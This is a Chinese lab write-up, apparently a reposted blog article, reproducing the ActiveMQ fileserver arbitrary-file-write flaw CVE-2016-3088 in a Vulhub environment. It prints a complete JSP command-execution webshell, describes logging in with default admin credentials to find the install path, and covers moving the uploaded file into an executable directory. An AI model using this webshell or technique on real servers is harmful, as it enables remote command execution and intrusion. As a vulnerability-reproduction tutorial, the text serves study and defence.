CVE-2016-3088漏洞复现

这篇具有很好参考价值的文章主要介绍了CVE-2016-3088漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.背景介绍。

ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。

fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  1. 其使用率并不高
  2. 文件操作容易出现漏洞

所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

在测试过程中,可以关注ActiveMQ的版本,避免走弯路。

2.环境介绍。

采用kali搭建Vulhub靶场。

靶机:127.0.0.1

环境监听61616端口和8161端口,其中8161为web控制台端口,本漏洞就出现在web控制台中。

访问http://172.18.0.1:8161/看到web页面,说明环境已成功运行。

3.漏洞复现。

本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

文件写入有几种利用方法:

  1. 写入webshell
  2. 写入cron或ssh key等文件
  3. 写入jar或jetty.xml等库和配置文件

写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

分别说一下上述几种利用方法。

(1)写入webshell

我们首先要通过账号密码登录

账号:admin
密码:admin

之后访问http://127.0.0.1:8161/admin/test/systemProperties.jsp来获取真实路径

CVE-2016-3088漏洞复现

进入/fileserver/目录,抓包写入webshell

CVE-2016-3088漏洞复现

<%
// 如果请求参数pwd的值为"023"
if("023".equals(request.getParameter("pwd"))){
    // 获取执行命令的参数i
    String cmd = request.getParameter("i");
    // 执行命令并获取子进程的输入流
    java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    // 输出<pre>标签
    out.print("<pre>");
    // 读取子进程的输出流并输出
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    // 输出</pre>标签
    out.print("</pre>");
}
%>

注意这时我们虽然写入文件,但我们去访问这个文件时会发现.txt文件并没有被解析

CVE-2016-3088漏洞复现

 所以我们还需要将这个文件去移动到一个有执行jsp文件权限的目录下,这时我们就用到了我们在之前查询到的真实路径,还是通过抓包来操作

CVE-2016-3088漏洞复现

 我们将webshell写入api目录下,进入/api/查看

CVE-2016-3088漏洞复现

 写入成功,进入后根据小马参数构建命令即可

CVE-2016-3088漏洞复现

 除此之外,还有其他两种方法利用,但笔者在复现过程中遇到问题较多,没有进行下去,哪位大佬有成功浮现的,踢我一下。

 文章来源地址https://www.toymoban.com/news/detail-425108.html

到了这里,关于CVE-2016-3088漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub_phpmyadmin_CVE-2016-5734漏洞复现

    漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,

    2024年02月08日
    浏览(26)
  • ActiveMQ 任意文件上传漏洞复现

    ​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息 ​ 如:  Authorization: Basic YWRtaW46YWRtaW4= ​ 访问任意页面并抓包,注意headers中的验证信息 ​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下 ​ 如上

    2024年04月16日
    浏览(35)
  • Apache ActiveMQ RCE漏洞复现

    1、 产品简介 ActiveMQ是一种开源的基于JMS(Java Message Servie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。 2、 漏洞概述 Apache Act

    2024年01月22日
    浏览(33)
  • ActiveMQ反序列化漏洞原理+复现

    ActiveMQ反序列化漏洞 ActiveMQ ActiveMQ是开源消息总线,消息中间件 工作原理 通过使用消息队列,实现服务的异步处理,主要目的是减少请求响应时间和解耦合。 消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。 从以上内容中可

    2024年02月05日
    浏览(48)
  • nginx相关漏洞处理:CVE-2016-2183、CVE-2022-41741、CVE-2022-41742

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 漏扫发现机器上的nginx使用的openssl版本有点低,在加上nginx的部署时间较早,还是1.20.2版本的,一起进行升级。 SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】 nginx 缓冲区错误漏洞(CVE-2022-41741) nginx 越

    2024年02月08日
    浏览(32)
  • 漏洞修复---SSL/TLS协议信息泄露漏洞(CVE-2016-2183)

    1.查看当前openssl版本       我线上版本是   OpenSSL 1.0.2k-fips 26 Jan 2017  官网下载最新版本 【当前我下载的版本为 openssl-1.1.1q】 2.将压缩包上传到linux服务器     tar -zxvf openssl-1.1.1q.tar.gz 3.编译安装 4. 移除老版本openssl 5. 查看版本 openssl version 报错    openssl: error while loadi

    2024年02月16日
    浏览(40)
  • 解决漏洞:SSL/TLS协议信息泄露漏洞(CVE-2016-2183)

    错误详情: 解决方案  win2012R2解决办法 参考链接:Browse code samples | Microsoft Learn 下载该ps1的文件。 下载该ps1的文件。 首先运行PowerShell后去文件夹中运行,或者直接输入 D:Solve-Sweet32.ps1 即可 参考链接  SSL/TLS协议信息泄露漏洞(CVE-2016-2183)解决办法(WindowsServer2012r2 3389端口 )

    2024年02月12日
    浏览(37)
  • Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

      ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。  Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,

    2024年02月08日
    浏览(67)
  • windows修复SSL漏洞CVE-2016-2183(3389端口)

    删除旧的,替换新的 old: new: 应用-确定 重启服务器

    2024年02月11日
    浏览(28)
  • 记录Windows Server CVE-2016-2183/CVE-2015-2808/CVE-2013-2566原理扫描漏洞修复

    *漏洞扫描出如下漏洞,针对标记的三个进行漏洞修复。 *关键:禁用3DES/RC4加密 1.Win+R运行:regedit,进入注册表。 2.进入目录:[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersSCHANNELCiphers 3.在Ciphers下新建5个项,分别对应如下,进行命名: RC4 40/128 、RC4 56/128、RC4 64/128、

    2024年02月13日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包